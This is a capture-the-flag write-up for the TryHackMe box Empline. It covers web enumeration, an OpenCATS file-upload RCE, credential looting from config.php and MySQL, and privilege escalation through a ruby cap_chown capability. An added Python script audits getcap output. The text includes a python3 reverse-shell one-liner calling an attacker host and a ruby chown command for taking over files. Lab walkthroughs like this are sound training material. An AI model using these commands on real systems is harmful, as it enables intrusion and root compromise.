THM Empline
Last updated
Another day, another challenge: I randomly picked a free box and Empline was chosen. This box was created by Touklwez, who previously also created the box Mustachhio. I hope you had fun with this one! Good Hacking!
As usual, start with a basic nmap scan. I like to use
sudo nmap -p- --open -T4 {machine_IP}
and gobuster to brute-force directories.
From both results, we know that three ports are open, and gobuster did not return anything interesting. Next, I used LinkFinder to look for hidden directories referenced in JavaScript files.
This scan revealed another subdomain. Let's add it to our hosts file and start directory brute-forcing again.
We got a bunch of interesting directories. Let's proceed to the landing page.
The landing page asks for a login with username and password.
I got a lot of information from this page and its source code: OpenCATS v0.9.4 and some credentials (default and testing). Unfortunately, neither set of credentials works. Rabbit hole!!
Next, I looked for vulnerabilities in this open-source ATS. According to Exploit-DB, this version is vulnerable because it fails to validate file uploads.
Using the provided PoC, I got a shell as www-data.
Here we can catch a shell with this command, taken from revshells:
export RHOST="yourmachine";export RPORT=port;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
After starting a listener, we get a raw shell and stabilise it with the usual commands.
Since we are www-data, I normally search for config.php, since that file often contains sensitive information that is useful to an attacker.
We got database credentials. The earlier scan showed the MySQL port is open, so let's connect to MySQL with the credentials we found.
We got the list of available databases. Let's look for credentials here.
This table gives us two users, but earlier enumeration showed the user is George. Let's take the hash and recover the real password.
We're in!! Here is the first flag.
Checking the user's sudo permissions, nothing interesting. Next, I checked SUID binaries and file capabilities; this command lists the capabilities:
getcap -r / 2>/dev/null
Ruby has a capability that lets it change the owner of any file. After some research, I simply assigned ownership of the restricted file to George (not the most practical way). Alternatively, one could change the root password, add a new user to the root group, or assign ownership of another file.
ruby -e "require 'fileutils'" -e "FileUtils.chown('user','user','<pathfile>')"
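The root cause here is a file capability granted to an interpreter, which is something an administrator can audit for. The following is an added example, not part of the original write-up, that parses the output of getcap -r / 2>/dev/null and flags risky capabilities, treating any capability on an interpreter such as ruby or python as a finding. The sample getcap output is constructed, and both getcap output formats (older "path = caps+ep" and newer "path caps=ep") are handled.

```python
import re

# Capabilities that allow privilege escalation or bypass file permissions.
# cap_chown is the one abused on this box; the rest are the usual suspects.
RISKY_CAPS = {
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module",
}

# Any capability on an interpreter is handed to whoever can run a script.
INTERP_RE = re.compile(r"^(ruby|python|perl|php|node|bash|sh|dash|zsh|lua)(\d|\.|-|$)")

# getcap prints "path = caps+ep" (libcap < 2.41) or "path caps=ep" (newer).
LINE_RE = re.compile(r"^(?P<path>\S+)(?:\s+=\s+|\s+)(?P<caps>\S+)$")

def parse_getcap(output):
    """Return [(path, {capability, ...}), ...] from getcap -r output."""
    entries = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # "cap_chown,cap_setuid+ep" or "cap_chown=ep": drop the flag suffix
        caps = re.split(r"[+=]", m.group("caps"))[0]
        entries.append((m.group("path"), set(caps.split(","))))
    return entries

def is_interpreter(path):
    return INTERP_RE.match(path.rsplit("/", 1)[-1]) is not None

def find_risky(output):
    """Flag interpreters with any capability and other binaries with risky ones.
    Remediation for a finding is: setcap -r <path>, or a package reinstall."""
    findings = []
    for path, caps in parse_getcap(output):
        if is_interpreter(path):
            findings.append((path, sorted(caps), "interpreter with file capability"))
        elif caps & RISKY_CAPS:
            findings.append((path, sorted(caps & RISKY_CAPS), "risky capability"))
    return findings

# Constructed sample output; the ruby line mirrors the situation on this box.
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/local/bin/ruby = cap_chown+ep
/usr/bin/python3.8 cap_setuid=ep
/usr/sbin/mtr-packet = cap_net_raw+ep
"""

if __name__ == "__main__":
    for path, caps, why in find_risky(SAMPLE):
        print(f"{path}: {','.join(caps)} ({why})")
```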
We got the root flag. Thanks for reading!
Opencats ATS system leads to RCE
Ruby capabilities